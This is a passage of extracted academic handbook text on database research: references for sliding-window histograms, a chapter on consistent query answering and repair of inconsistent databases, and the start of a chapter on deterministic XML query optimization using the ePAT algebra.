tributions on data streams via dynamic inverse sampling. In Proceedings of the 31st International Conference on Very Large Data Bases, 25-36. Cormode, G., & Garofalakis, M. (2005). Sketching streams through the net: distributed approximate query tracking. In Proceedings of the 31st International Conference on Very Large Data Bases, 13-24. Das, A., Gehrke, J., & Riedewald, M. (2003). Approximate join processing over data streams. In Proceedings of the 2003 ACM SIGMOD International Conference on Management of Data, 40-51. Datar, M., Gionis, A., Indyk, P., & Motwani, R. (2002). Maintaining stream statistics over sliding windows [Abstract]. In Proceedings of the 13th Annual ACM-SIAM Symposium on Discrete Algorithms, 635-644. Dong, G., Han, J., Lakshmanan, L. V. S., Pei, J., Wang, H., & Yu, P. S. (2003, June). Online mining of changes from data streams: Research problems and preliminary results. Paper presented at the ACM SIGMOD Workshop on Management and Processing of Data Streams, San Diego, CA. Feigenbaum, J., Kannan, S., Strauss, M., & Viswanathan, M. (2002). An approximate L1-difference algorithm for massive data streams. SIAM Journal on Computing, 32(1), 131-151. Garofalakis, M., Gehrke, J., & Rastogi, R. (2002). Querying and mining data streams: You only get one look (tutorial). In Proceedings of the ACM SIGMOD International Conference on Management of Data, 61-72. Gilbert, A. C., Kotidis, Y., Muthukrishnan, S., & Strauss, M. J. (2001). Surfing wavelets on streams: one-pass summaries for approximate aggregate queries. In Proceedings of the 2001 Conference on Very Large Databases, 79-88. Guha, S., Koudas, N., & Shim, K. (2001). Datastreams and histograms. In Proceedings of the
thirty-third annual ACM symposium on Theory of computing, 471-475. Guha, S., & Koudas, N. (2002). Approximating a Data Streams for Querying and Estimation: Algorithms and Performance Evaluation, In Proceedings of the 18th International Conference on Data Engineering, 567-576. Guha, S., Shim, K., & Woo, J. (2004). REHIST: Relative Error Histogram Construction Algorithms. In Proceedings of the 2004 Conference on Very Large Databases, 300-311. Jagadish, H. V., Koudas, N., Muthukrishnan, S., Poosala, V., Sevcik, K. C., & Suel, T. (1998). Optimal histograms with quality guarantees. In Proceedings of the 24th International Conference on Very Large Data Bases, 275-286. Koudas, N., Muthukrishnan, S., & Srivastava, D. (2000). Optimal histograms for hierarchical range queries (extended abstract). In Proceedings of the nineteenth ACM SIGMOD-SIGACT-SIGART Symposium on Principles of Database Systems, 196-204. Li, J., Maier, D., Papadimos, V., Tufte, K., & Tucker, P. A. (2005). No pane, no gain: efficient evaluation of sliding-window aggregates over data streams. SIGMOD Record, 34(1), 39-44. Lin, X., Lu, H., Yuan, Y., & Wang, W. (2005). Stabbing the Sky: Efficient Skyline Computation over Sliding Windows. In Proceedings of the International Conference on Data Engineering, 502-513. Matias, Y., Vitter, J. S., & Wang, M. (1998). Wavelet-based histograms for selectivity estimation. In Proceedings of the 1998 ACM SIGMOD International Conference on Management of Data, 448-459. Matias, Y., Vitter, J. S., & Wang, M. (2000). Dynamic maintenance of wavelet-based histograms. In Proceedings of 26th International Conference on Very Large Data Bases, 101-110.
2049
Approximate Range Querying over Sliding Windows
Manku, V. S., & Motwani, R. (2002). Approximate frequency counts over data streams. In Proceedings of 28th International Conference on Very Large Data Bases, 346-357. University of California. (1993). California Weather Databases, Santa Barbara station records, 1993 [Data file]. Available from University of California Integrated Pest Management (UC-IPM) Web site, http://www.ipm.ucdavis.edu/calludt. cgi/WXSTATIONDATA?STN=STBARBRA.A
KEY TERMS Bucket: An element obtained by partitioning the domain of an attribute X of a relation into non overlapping intervals. Each bucket consists of a tuple 〈inf, sup, val〉 where val is an aggregate information (i.e., sum, average, count, and so on) about tuples with value of X belonging to the interval (inf, sup). Bucket-Based Histogram: A type of histogram whose construction is driven by the search of a suitable partition of the attribute domain into buckets.
Data Stream Pre-Processing: The application, prior to the mining phase, of several methods, aimed to improve the overall data mining results. Usually, it consists of (1) data cleaning, that is a method for fixing missing values, outliers and possible inconsistent data and (2) data reduction, that is the application of any technique (affecting data representation) which is capable of saving storage space without compromising the possibility of inquiring compressed data. Data Stream: Data that is structured and processed in a continuous flow, such as digital audio and video or data coming from digital sensors. Histogram: A set of buckets implementing a partition of the overall domain of a relation attribute. Range Query: A query returning an aggregate information (such as sum, or average) about data belonging to a given interval of the domain. Sliding Window: A sequence of the most recent values, arranged in arrival time order, that are collected from a data stream. Wavelets: Mathematical transformations implementing hierarchical decomposition of functions leading to the representation of functions through sets of real-number coefficients.
This work was previously published in Handbook of Research on Text and Web Mining Technologies, edited by M. Song and Y.-F. Wu, pp. 273-287, copyright 2009 by Information Science Reference (an imprint of IGI Global).
2050
2051
Chapter 7.3
Consistent Queries over Databases with Integrity Constraints Luciano Caroprese DEIS Universitá della Calabria, Italy Cristian Molinaro DEIS Universitá della Calabria, Italy Irina Trubitsyna DEIS Universitá della Calabria, Italy Ester Zumpano DEIS Universitá della Calabria, Italy
INTRODUCTION Integrating data from different sources consists of two main steps, the first in which the various relations are merged together, and the second in which some tuples are removed (or inserted) from the resulting database in order to satisfy integrity constraints. There are several ways to integrate databases or possibly distributed information sources, but whatever integration architecture we choose, the heterogeneity of the sources to be integrated causes subtle problems. In particular, the database obtained from the integration process
may be inconsistent with respect to integrity constraints, that is, one or more integrity constraints are not satisfied. Integrity constraints represent an important source of information about the real world. They are usually used to define constraints on data (functional dependencies, inclusion dependencies, etc.) and have, nowadays, a wide applicability in several contexts such as semantic query optimization, cooperative query answering, database integration, and view update. Since the satisfaction of integrity constraints cannot generally be guaranteed, if the database is obtained from the integration of different infor-
Consistent Queries over Databases with Integrity Constraints
mation sources, in the evaluation of queries, we must compute answers that are consistent with the integrity constraints. The following example shows a case of inconsistency. Example 1: Consider the following database schema consisting of the single binary relation Teaches (Course, Professor) where the attribute Course is a key for the relation. Assume there are two different instances for the relations Teaches, D1={(c1,p1),(c2,p2)} and D2={(c1,p1),(c2,p3)}. The two instances satisfy the constraint that Course is a key, but from their union we derive a relation that does not satisfy the constraint since there are two distinct tuples with the same value for the attribute Course. In the integration of two conflicting databases simple solutions could be based on the definition of preference criteria such as a partial order on the source information or a majority criterion (Lin & Mendelzon, 1996). However, these solutions are not generally satisfactory, and more useful solutions are those based on (1) the computation of “repairs” for the database, and (2) the computation of consistent answers (Arenas, Bertossi, & Chomicki, 1999). The computation of repairs is based on the definition of minimal sets of insertion and deletion operations so that the resulting database satisfies all constraints. The computation of consistent answers is based on the identification of tuples satisfying integrity constraints and on the selection of tuples matching the goal. For instance, for the integrated database of Example 1, we have two alternative repairs consisting in the deletion of one of the tuples (c2,p2) and (c2,p3). The consistent answer to a query over the relation Teaches contains the unique tuple (c1,p1) so that we do not know which professor teaches course c2. Therefore, it is very important, in the presence of inconsistent data, not only to compute the set of consistent answers, but also to know which facts are unknown and if there are possible repairs for the database.
2052
BACKGROUND Several proposals considering the integration of databases as well as the computation of queries over inconsistent databases have been provided in the literature (Agarwal, Keller, Wiederhold, & Saraswat, 1995; Arenas et al., 1999; Arenas, Bertossi, & Chomicki, 2000; Bry, 1997; Dung, 1996; Greco & Zumpano, 2000; Lin, 1996; Lin & Mendelzon, 1996; Lembo, Lenzerini, & Rosati, 2002; Lenzerini, 2002; Wijsen, 2003). Most of the techniques for computing queries over inconsistent databases work for restricted cases, and only recently have there been proposals to consider more general constraints. This section provides an informal description of the main techniques proposed in the literature. •
•
Lin and Mendelzon (1996) proposed an approach taking into account the majority view of the knowledge bases in order to obtain a new relation that is consistent with the integrity constraints. The technique proposes a formal semantics to merge first order theories under a set of constraints. However, the “merging by majority” technique does not resolve conflicts in all cases since information is not always present in the majority of the databases, and, therefore, it is not always possible to choose between alternative values. Moreover, the use of the majority criteria involves discarding inconsistent data and hence the loss of potentially useful information. Arenas et al. (1999) introduced a logical characterization of the notion of consistent answer in a possibly inconsistent database. The technique is based on the computation of an equivalent query Tω(Q) derived from the source query Q. The definition of Tω(Q) is based on the notion of residue developed in the context of semantic query optimization.
Consistent Queries over Databases with Integrity Constraints
•
More specifically, for each literal B, appearing in some integrity constraint, a residue Res(B) is computed. Intuitively, Res(B) is a universal quantified first order formula that must be true, because of the constraints, if B is true. The technique, more general than the previous ones, has been shown to be complete for universal binary integrity constraints and universal quantified queries. However, the rewriting of queries is complex since the termination conditions are not easy to detect and the computation of answers generally is not guaranteed to be polynomial. Arenas et al. (2000) proposed an approach consisting in the use of a Logic Program with exceptions (LPe) for obtaining consistent query answers. An LPe is a program with the syntax of an extended logic program (ELP), that is, in it we may find both logical (or strong) negation (¬) and procedural negation (not). In this program, rules with a positive literal in the head represent a sort of general default, whereas rules with a logically negated head represent exceptions. The semantic of an LPe is obtained from the semantics for ELPs, by adding extra conditions that assign higher priority to exceptions. The method, given a set of integrity constraints ICs and an inconsistent database instance, consists in the direct specification of database repairs in a logic programming formalism. The resulting program will have both negative and positive exceptions, strong and procedural negations, and disjunctions of literals in the head of some of the clauses, that is, it will be a disjunctive extended logic program with exceptions. As shown by Arenas et al. (1999), the method considers a set of integrity constraints, IC, written in the standard format ∨ in=1 Pi (xi ) ∨ ∨ mi =1 (¬Q i (y i ) ∨ , where ϕ is a formula containing only built-in predicates, and there is an implicit universal quantification in front. This method specifies
•
the repairs of the database, D, that violate IC, by means of a logical program with exceptions, ΠD. In ΠD, for each predicate P a new predicate P’ is introduced, and each occurrence of P is replaced by P’. The method can be applied to a set of domain independent binary integrity constraints IC, that is, the constraint can be checked w.r.t. satisfaction by looking to the active domain, and in each IC appear at most two literals. Calì, Calvanese, De Giacomo, and Lenzerini (2002), Lembo et al. (2002), and Lenzerini (2002) proposed a framework for data integration that allows to specify a general form of integrity constraints over the global schema, and it is defined a semantics for data integration in the presence of incomplete and inconsistent information sources. Moreover, it is defined as a method for query processing under the previous semantics when key constraints and foreign key constraints are defined upon the global schema. Formally, a data integration system I is a triple , where G is the global schema, S is the source schema, and MG,S is the mapping between G and S. More specifically, the global schema is expressed in the relational model with both key and foreign key constraints; the source schema is expressed in the relational model without integrity constraints; and the mapping is defined between the global and the source schema, that is, each relation in G is associated with a view, that is, a query over the sources. The semantics of a data integration system is given by considering a source database D for I, that is, a database for the source schema S containing relation rD for each source r in S. Any database G is a global database for I, and it is said legal w.r.t. D if: • It satisfies the integrity constraints defined on G.
2053
Consistent Queries over Databases with Integrity Constraints
•
It satisfies the mapping w.r.t. D, that is, for each relation r in G, the set of tuples rB that B assigns to r is a subset of the set of tuples ρ (r)D computed by the associated query ρ(r) over D: ρ (r)D ⊆ rB. In this framework, the semantics of I w.r.t. a source database D, denoted semD(I ,D), is given in terms of a set of databases. In particular, semD(I , D) = { B | B is a legal global database for I, w.r.t. D}. If semD(I , D) ≠ ∅, then I is said to be consistent w.r.t. D. In this setting, a query q posed to a data integration system I is a conjunctive query over the global schema, whose atoms have symbols in G as predicates. A tuple (c1, .., cn) is considered an answer to the query only if it is a certain answer, that is, if it satisfies the query in every database that belongs to the semantics of the data integration system. The retrieved global database, denoted by ret(I, D), is obtained by computing for each relation r of the global schema rD; the query ρ(r) is then evaluated the query over the source database D. Note that the retrieved global database satisfies all the key constraints in G, as it is assumed that ρ(r) does not violate the key constraints; thus, if ret(I,D) also satisfies the foreign key constraints, then the answer to a query q can be done by simply evaluating it over ret(I,D). If it is the case that ret(I,D) violates the foreign key constraints, then tuples have
•
to be added to the relations of the global schema in order to satisfy them. Obviously in general there are an infinite number of legal database that are coherent with the retrieved global database, even if it is shown that there exists one, the canonical database, denoted can(I,D), that represents all the legal databases that are coherent with the retrieved global database. Thus formally the answer to a query q can be given by evaluating can(I, D). Anyhow, the computation of the canonical database is impractical, as generally the database can be infinite; thus, Calì et al. (2002) defined an algorithm that computes the certain answers of a conjunctive query q without actually building can(I, D). Wijsen (2003) proposed a general framework for repairing databases. In particular the author stressed that an inconsistent database can be repaired without deleting tuples (tuplebased approach), but using a finer repair primitive consisting in correcting faulty values within the tuples, without actually deleting them (value-based approach). Example 2: Suppose to have the following set of tuples reporting the dioxin levels in food samples: (see below), and the constraint:
Consistent Queries over Databases with Integrity Constraints
that imposes the date of analyzing a given sample cannot precede the date the sample was taken. The first tuple in the Dioxin Database says that the sample 110 was taken on January 17, 2002, and analyzed the day after at the ICI lab, and that the dioxin level of this sample was normal. While the sample 110 respects the constraint, the sample 220 violates it. An inconsistency is present in the database, and the author claims to “clean” it in a way that avoids deleting the entire tuple, that is, acting at the attribute level and not at the tuple level. Given an inconsistent database, a consistent answer can be obtained by letting the database in its inconsistent state, and by propagating in the answer the consistent portion of the database, that is, the set of tuples matching the query and satisfying the constraints. As the repair work is deferred until query time, this approach is called late-repairing. In this framework an alternative technique is proposed consisting in a database transformation. Given a satisfiable set of constraints Σ, that is, a set of finite constraints, and a relation I, apply a database transformation hΣ : I → I such that for every query Q, Q(hΣ(I)) yields exactly the consistent answer to Q on input I and Σ. Observe that hΣ(I) is not necessarily a repair for I and Σ; it can be thought of as a “condensed representation” of all possible repairs for I and Σ that is sufficient for consistent query answering. The practical intuition is that an inconsistent database I is first transformed through hΣ in such a way that the subsequent queries on the transformed database retrieve exactly the consistent answer; since databases are modified prior to query execution, this approach is called early-repearing.
Clearly for a given set of satisfiable constraints Σ, early and late repairing should yield the same set of consistent answers, hence fΣ(Q)(I)=Q(hΣ(I)), for every query and every relation.
A NEW TECHNIQUE FOR QUERYING AND REPAIRING INCONSISTENT DATABASES Greco, Greco, and Zumpano (2001, 2003) and Greco and Zumpano (2000) proposed a general framework for computing repairs and consistent answers over inconsistent databases with universally quantified variables. The technique is based on the rewriting of constraints into extended disjunctive rules with two different forms of negation (negation as failure and classical negation). The disjunctive program can be used for two different purposes: compute “repairs” for the database, and produce consistent answers, that is, a maximal set of atoms that do not violate the constraints. The technique is sound and complete (each stable model defines a repair, and each repair is derived from a stable model) and more general than techniques previously proposed. Specifically, the technique is based on the generation of an extended disjunctive program LP derived from the set of integrity constraints. The repairs for the database can be generated from the stable models of LP, whereas the computation of the consistent answers of a query (g,P) can be derived by considering the stable models of the program P ∪ LP over the database D. Let c be a universally quantified constraint of the form: ∀ X [ B1 ∧ ... ∧ Bk ∧ not Bk+1 ∧ ... ∧ not Bn ∧ φ ⊃ B0 ] then, dj(c) denotes the extended disjunctive rule
2055
Consistent Queries over Databases with Integrity Constraints
¬B’1∨ ... ∨ ¬B’k ∧ B’k+1 ∨ ... ∨ B’n ∨ B’0 ← (B1∨ B’1), …, (Bk∨ B’k), (not Bk+1∨ ¬B’k+1), …, (not Bn∨ ¬B’n), φ ,(not B0∨ ¬B’0), where B’i denotes the atom derived from Bi, by replacing the predicate symbol p with the new symbol pd if Bi is a base atom otherwise is equal to false. Let IC be a set of universally quantified integrity constraints, then DP(IC) = { dj(c) | c ∈ IC }, whereas LP(IC) is the set of standard disjunctive rules derived from DP(IC) by rewriting the body disjunctions. Clearly, given a database D and a set of constraints, IC, LP(IC)D denotes the program derived from the union of the rules LP(IC) with the facts in D, whereas SM(LP(IC)D) denotes the set of stable models of LP(IC)D, and every stable model is consistent since it cannot contain two atoms of the form A and ¬A. The following example shows how constraints are rewritten.
M1 = D ∪ { ¬pd(b), ¬qd(a) }, M2 = D ∪ { ¬pd(b), rd(a) }, M3 = D ∪ { ¬qd(a), sd(b) }, M4 = D ∪ { rd(a), sd(b) }, M5 = D ∪ { qd(b), ¬qd(a), rd(b) } and M6 = D ∪ { qd(b), rd(a), rd(b) }. A (generalized) extended disjunctive Datalog program can be simplified by eliminating from the body rules all literals whose predicate symbols are derived and do not appear in the head of any rule (these literals cannot be true). As mentioned before, the rewriting of constraints into disjunctive rules is useful for both (1) making the database consistent through the insertion and deletion of tuples, and (2) computing consistent answers leaving the database inconsistent.
Example 3: Consider the following integrity constraints:
FUTURE TRENDS ∀X [ p(X) ∧ not s(X) ⊃ q(X) ] ∀X [ q(X) ⊃ r(X) ] and the database D containing the facts p(a), p(b), s(a), and q(a). The derived generalized extended disjunctive program is defined as follows: ¬ pd(X) ∨ sd(X) ∨ qd(X) ← (p(X) ∨ pd(X)) ∧ (not s(X) ∨ ¬ sd(X)) ∧ (not q(X) ∨ ¬ qd(X)). ← (q(X) ∨ qd(X)) ∧ (not ¬ qd(X) ∨ rd(X) r(X) ∨ ¬rd(X)). The previous rules can now be rewritten in standard form. Let P be the corresponding extended disjunctive Datalog program. The computation of the program PD gives the following stable models:
2056
As a future trend, an interesting topic consists in specifying preference criteria so that selecting among a set of feasible repairs the preferable ones, that is, those better conforming to the specified criteria. Preference criteria introduce desiderata on how to update the inconsistent database in order to make it consistent; thus they can be considered as a set of desiderata that are satisfied if possible by a generic repair. Therefore, informally a preferred repair is a repair that better satisfies preferences. Preliminary results have been published by Greco, Sirangelo, and Trubitsyna (2003).
CONCLUSION In the integration of knowledge from multiple sources, two main steps are performed, the first in which the various relations are merged together,
Consistent Queries over Databases with Integrity Constraints
and the second in which some tuples are removed (or inserted) from the resulting database in order to satisfy integrity constraints. The database obtained from the merging of different sources could contain inconsistent data. In this article we investigated the problem of querying and repairing inconsistent databases. In particular we presented the different techniques for querying and repairing inconsistent databases (Agarwal et al., 1995; Arenas et al., 1999; Greco & Zumpano, 2000; Lin & Mendelzon, 1996).
REFERENCES
Grant, J., & Subrahmanian, V. S. (1995). Reasoning in inconsistent knowledge bases. TKDE Conference (Vol. 7, 177-189). Greco, G., Greco, S., & Zumpano, E. (2001). A logic programming approach to the integration, repairing and querying of inconsistent databases. ICLP Conference (pp. 348-364). Greco, G., Greco, S., & Zumpano, E. (2003). A logical framework for querying and repairing inconsistent databases. TKDE (15, 1389-1408). Greco, G., Sirangelo C., Trubitsyna I., & Zumpano, E. (2003). Preferred repairs for inconsistent databases. IDEAS Conference (pp. 202-211).
Arenas, M., Bertossi, L., & Chomicki, J. (1999). Consistent query answers in inconsistent databases. PODS Conference (pp. 68-79).
Arenas, M., Bertossi, L., Chomicki, J. (2000). Specifying and querying database repairs using logic programs with exceptions. FQAS Conference (pp. 27-41).
Lembo, D., Lenzerini, M., & Rosati, R. (2002). Incompleteness and inconsistency in information integration. KRDB Conference, Toulouse, France.
Argaval, S., Keller, A. M., Wiederhold, G., & Saraswat, K. (1995). Flexible relation: An approach for integrating data from multiple, possibly inconsistent databases. ICDE Conference (pp. 495-504).
Lenzerini, M. (2002). Data integration: A theoretical perspective. PODS (pp. 233-246).
Baral, C., Kraus, S., Minker, J., & Subrahmanian, V. S. (1999). Combining knowledge bases consisting of first order theories. ISMIS Conference (pp. 92-101). Bry, F. (1997). Query answering in information system with integrity constraints. In IFIP WG 11.5 Working Conf. on Integrity and Control in Inform. System (pp. 113-130). Calì, A., Calvanese, D., De Giacomo, G., & Lenzerini, M. (2002). Data integration under integrity constraints. CAiSE02 Conference (pp. 262-279). Dung, P. M. (1996). Integrating data from possibly inconsistent databases. CoopIS Conference (pp.58-65).
Lin, J. (1996). A semantics for reasoning consistently in the presence of inconsistency. Artificial Intelligence, 86(1), 75-95. Lin, J., & Mendelzon, A. O. (1996). Merging databases under constraints. Int. Journal of Cooperative Information Systems, 1(7), 55-76. Wijsen, J. (2003). Condensed representation of database repair for consistent query. ICDT (pp. 378-393).
KEY TERMS Consistent Answer: A set of tuples, derived from the database, satisfying all integrity constraints. Consistent Database: A database satisfying a set of integrity constraints. 2057
Consistent Queries over Databases with Integrity Constraints
Data Integration: A process providing a uniform integrated access to multiple heterogeneous information sources. Database Repair: Minimal set of insert and delete operations that makes the database consistent. Disjunctive Datalog Program: A set of rules of the form:
A1 ∨… ∨ Ak ← B1, ..., Bm, not Bm+1, …,not Bn, k+m+n>0, where A1,…, Ak, B1,…, Bn are atoms of the form p(t1,..., th), p is a predicate symbol of arity h, and the terms t1,..., th are constants or variables. Inconsistent Database: A database violating some integrity constraints. Integrity Constraints: A set of constraints that must be satisfied by database instances.
This work was previously published in Encyclopedia of Information Science and Technology, Section Edition, edited by M. Khosrow-Pour, pp. 691-695, copyright 2009 by Information Science Reference (an imprint of IGI Global).
2058
2059
Chapter 7.4
A Deterministic Approach to XML Query Processing with Efficient Support for Pure and Negated Containments Dunren Che Illinois University at Carbondale, USA
ABSTRACT
INTRODUCTION
This article reports the result of the author’s recent work on XML query processing/optimization, which is a very important issue in XML data management. In this work, in order to more effectively and efficiently handle XML queries involving pure and/or negated containments, a previously proposed deterministic optimization approach is largely adapted. This approach resorts to heuristic-based deterministic transformations on algebraic query expressions in order to achieve the best possible optimization efficiency. Specialized transformation rules are thus developed, and efficient implementation algorithms for pure and negated containments are presented as well. Experimental study confirms the validity and effectiveness of the presented approach and algorithms in processing of XML queries involving pure and/or negated containments.
XML has become the de facto standard for information, data exchange, and representation on the Internet and elsewhere. As a result, more and more data sources have been adopting the XML standard. The rapid accumulation of XML data calls for specialized solutions for managing and querying XML data resources. Among the many challenges related to the XML database management technology, XML query optimization is very interesting because it not only is a critical issue for XML DBMS but it also provides a key infrastructure for the future semantic Web and applications (especially, the semantic-based Web search engines). Query optimization typically applies the costbased approach (Selinger, Astrahan, Chamberlin, Lorie, & Price, 1979) and aims at obtaining the least expensive—the optimal—evaluation plan for each input query. Heuristic knowledge may
be exploited in addition so that a reduced number of (only highly potential) candidate plans need to be examined and from which the best plan is to be identified. XML data has the semi-structured nature and XML queries needed to check not only the contents but also the structural patterns of the source XML data. Comparing to relational data, XML data has higher complexity (as it has to additionally deal with the structural part), and this complexity trivially translates to an enlarged search space for the “optimal” plan during query optimization (assuming the cost-based approach is adopted). Consequently, a plain application of the cost-based optimization approach does not usually yield the same good efficiency for XML queries as it does for relational queries. On the other hand, apart from adding extra complexity and causing inefficient (cost-based) query optimization, the structural part of XML data implies a rich resource of knowledge that can be used in favor of efficient optimization of XML queries. We are thus motivated to develop a comprehensive optimization framework for XML queries. This framework consists of two separate yet collaborative optimization stages. The first stage performs logical-level optimization. This stage is unique to XML as it explores the specific features (e.g., semantic knowledge) of XML data for query optimization. By its nature, this stage is strongly heuristic-based because it does not rely on any particular knowledge about the underlying storage structure. The second stage—physical optimization—typically applies specialized cost-based optimization techniques. In such an optimization framework, these two stages need to collaborate in a way that the first stage provides a reduced (or pre-screened) set of logical plans to the second stage and the latter shall conduct specialized techniques for cost-based optimization by adequately considering the optimization that has already been exerted at the first stage. In previous research (Che, 2003, 2005, 2006), we studied the query equivalence issue in the
2060
context of XML, which forms the basis of our transformation-based optimization approach to XML queries. A comprehensive methodology for fast XML query optimization at the logic level was proposed (Che, Aberer, & Özsu, 2006) based on exclusive application of deterministic transformations on XML queries represented as PAT algebraic expressions (Böhm, Aberer, Özsu, & Gayer, 1998; Salminen & Tompa, 1994). The utmost benefit of this unique approach is the great potential for superb optimization efficiency. More recently, we substantially extended the PAT algebra, which leads to ePAT (extended PAT), endowed with more expressive power. Based on ePAT, we redefined the query equivalences and the deterministic transformation rules, and adapted the prior optimization strategy in order to efficiently support XML queries with pure and/or negated containments. Containment is a core operation in XML queries, and negated containment is as important as the regular containment for XML queries (for example, “find all employees who do not have a homepage,” though simple, can be a common (sub-)query pattern). However, little result on efficient support for pure and negated containments has been reported. In this article, we make the following important contributions: •
•
•
An adapted deterministic optimization approach for XML queries with pure and/or negated containments is presented. A group of specialized join algorithms dedicated for pure and negated containment operations are proposed (realizing the known structural join algorithms (Srivastava et al., 2002; Zhang, Naughton, DeWitt, Luo, & Lohman, 2001) cannot provide efficient support for these special containment operations). An experimental study is conducted, and the obtained result confirms the validity and effectiveness of this new approach and the specialized supporting algorithms.
A Deterministic Approach to XML Query Processing
The remainder of this article is set forth as follows: the second section provides necessary background knowledge and a sketchy overview of the new approach. The third section illustrates the new approach by presenting sample deterministic transformation rules that are later on applied to a running example (query). The fourth section presents a number of specialized join algorithms intended for pure and negated containments. The fifth section addresses the experimental study and result. The sixth section reviews related work before the article is finally concluded in the seventh section.
BACKGROUND KNOWLEDGE The main theme of this work is to carry out deterministic transformations on algebraic query expressions for optimization. This section first reviews a few important notions, then the ePAT algebra adopted in this work; after that, sample XML query equivalences are provided, and lastly, an overview of the adapted approach is furnished.
Basis Notions In XML documents/data, elements are identified by means of “tags.” For a given class of documents, the legal markup tags are defined in a DTD/XSD (XML Schema Definition). DTD and XSD basically serve the same kind of function, but the latter is more powerful. The presentation in this article is based on DTD, but the approach presented shall straightforwardly extend to the situations when XSD is used instead. A tag (with a distinct name) defined in a DTD corresponds to a type of XML data element, which may comprise some other tags in its content model. The constructional relationships among the element types are an important source of knowledge that will be utilized by our approach for efficiently pursuing XML query optimization. We introduce the DTD-graph mechanism to help envision important structural relationships among the element types. Instead of providing a formal definition for this notion, we use an example to illustrate it. Figure 1 shows part of the structural relationships existing among the elements (types) about open auctions, which was adopted by the
Figure 1. A portion of the XMark benchmark DTD-graph annotated with index info.
2061
A Deterministic Approach to XML Query Processing
XMark benchmark project (Schmidt et al., 2002). In Figure 1, a dashed arrowed line (which is not a necessary part in a DTD-graph) indicates a structure index is available. A structure index is formally defined as a map from the extent of one element type to the extent of another element type (Che et al., 2006). A structure index may be intuitively considered as a “shortcut” between the two related extents (of two different element types). In our test-bed, structure indices are implemented as materialized (or pre-computed) structural join results (Srivastava et al., 2002; Zhang et al., 2001). Containment is the dominant structural relationship in XML and is at the core of both the query languages, XPath (Clark & DeRose, 1999) and XQuery (Boag et al., 2003). Containments can be differentiated between direct containments (i.e., parent-child relations) and indirect containments (i.e., ancestor-descendent relations). A path in a DTD-graph is a sequence of edges. Paths are the primary means used in both XQuery (Boag et al., 2003) and XPath (Clark et al., 1999) to capture the structural relationships among the data elements. In addition to the DTD-graph and the path notions, we adopt three other important notions for capturing particularly interesting structural relationships in XML data. These notions were initially introduced by Böhm et al. (1998) and is extensively exploited in Che et al. (2006). We review the three notions below. 1.
2.
2062
Definition (Exclusivity): Element type ETj is exclusively contained in element type ETi if each path (ej,…,ek) with ej being an element of type ETj and ek the document root contains an element of type ETi. Definition (Obligation): Element type ETi obligatorily contains element type ETj if each element of type ETi in any document complying with the DTD has to contain an element of type ETj.
3.
Definition (Entrance location): Element type EL is an entrance location for τ(E1) and τ(E2) given in a DTD if in any document complying with the DTD, all paths from an element e1 of τ(E1) to an element e2 of τ(E2) toward the document root pass through an element el of τ(EL).
The ePAT Algebra for XML Query Optimization It is typical in a query optimizer to represent queries as algebraic expressions for expediently exploring alternate evaluation plans based on equivalent transformations. ePAT is the algebra adopted in this work, which is extended from PAT (Böhm et al., 1998; Salminen et al., 1994). In ePAT, an expression is generated according to the following grammar: Ε ::= etn | (Ε ) | Ε1 ∪ Ε2 | Ε1 ∩ Ε2 | Ε1 − Ε2 | σr (Ε ) | σa,r (Ε) | Ε1 ⊂ Ε2 | Ε1 ⊃ Ε2 | Ε1 Ε2 | πpl(Ε) | Ι(Ε) | −Ε “E” (as well “E1” and “E2”) stands for an ePAT expression, and etn, as the only atomic expression, retrieves the whole extent (i.e., all the instances) of the element type named etn. The expression (E) produces the same result as E and is needed mainly for composition purpose. ∪, ∩, and − are the three standard set operations. ePAT requests type compatibility for its set operations. σr (Ε) and σa,r (Ε) are the two basic selection operators applied to the textual contents and attribute values of elements, respectively. The “r” parameter in the two selection operators introduces a regular expression specifying a matching condition on the textual contents or attribute values of elements, and the “a” in σa,r(Ε) designates a particular attribute name. ⊂ returns elements of the first argument that are contained in an element decided by the second argument, and ⊃ returns elements of the first argument that contain an element of the second argument. ×c is a “power” join operation that can be tailored to
A Deterministic Approach to XML Query Processing
almost any specific form of joins such as structural joins (Srivastava et al., 2002; Zhang et al., 2001), unstructural joins (i.e., joins not based on any structural relationship), and Cartesian products based on the nature of the join predicate specified by the parameter c. πpl is the projection operator that carries a projection list specified by the parameter pl. I is a generic operation that connotes the application of a relevant index of any type (such as content indices of elements, value indices of attributes, and structure indices). Finally, −E stands for the “negated” form of E and here the E subexpression is limited to only a selection or a containment operation. When it is a selection, the negation is logically applied to the filtering condition of the selection operation; when it is a containment (e.g., Ε 1 ⊃ Ε 2), the negation is applied to the containment operation. It is helpful to point out that in the ePAT algebra, the containment operations, ⊃ and ⊂, are redundant (analogous to the natural join operation in the relational algebra), considering that they can be represented as a general structural join followed by a leftward projection. Yet, there are advantages of retaining this redundancy: considering the dominant role of containment operations in XML data and XML queries, dedicated containment operations greatly facilitate exploiting the structural relationships in XML data for query optimization. We use the following query as a running example. First, we show how the query is formulated as an ePAT expression. Later on, we show how (logical) optimization can be achieved through consecutive deterministic transformations performed on ePAT expressions. Example. Find the keyword from the annotation of an open _ auction that has received a bid from the person (an instance of bidder) whose reference is 123. A partial DTD-graph of the XML data source is shown in Figure 1. The corresponding XPath
expression and ePAT expression are respectively formulated as follows (our query optimization and processing will be solely based on ePAT expressions). XPath: //open_auction[./bidder[@personref=“123”]]/annotation//keyword ePAT: (keyword ⊂ (description ⊂ (open_auction ⊃ σa=‘personref’, r=‘123’ (Bidder))))
Sample XML Query Equivalences Our approach to XML query optimization is based on equivalent algebraic transformations, which are accomplished via deterministic transformation rules derived from equivalences in cooperation with relevant heuristics for query optimization in the context of XML. While these deterministic rules embody our optimization methodology, the equivalences form the basis of this work. In the following, sample equivalences are provided for illustration purpose. We identify three knowledge sources from which equivalences can be derived: set-theory properties, explicit constraints imposed by DTD/XSD, and hidden constraints representing knowledge about the structure of XML data (often implied in DTD/XSD). Accordingly, our equivalences are classified into three categories. It is worth noting that we would have obtained a (very) large number of equivalences including less-useful or even useless ones, if we do not limit our choice to only those potential ones from which profitable transformations can be derived. For instance, am equivalence must not imply transformations that merely complicate/expand a query without improving the query’s evaluation efficiency (from a heuristic point of view). In our work, equivalences take the form of “E1 ⇔ E2” and transformation rules take the form of “E1 ⇒ E2.” For compactness, we will use “σ” to simply represent both σr and σa,r, and use EL as a short hand notation for “entrance location.”
2063
A Deterministic Approach to XML Query Processing
In the following, we present sample equivalences from each category.
ε7. E1 ⊂ E2 ⇔ E1 ⊂ (E3 ⊂ E2) if E3 is an EL for and τ(E2) τ(E1)
Set-Oriented Equivalences
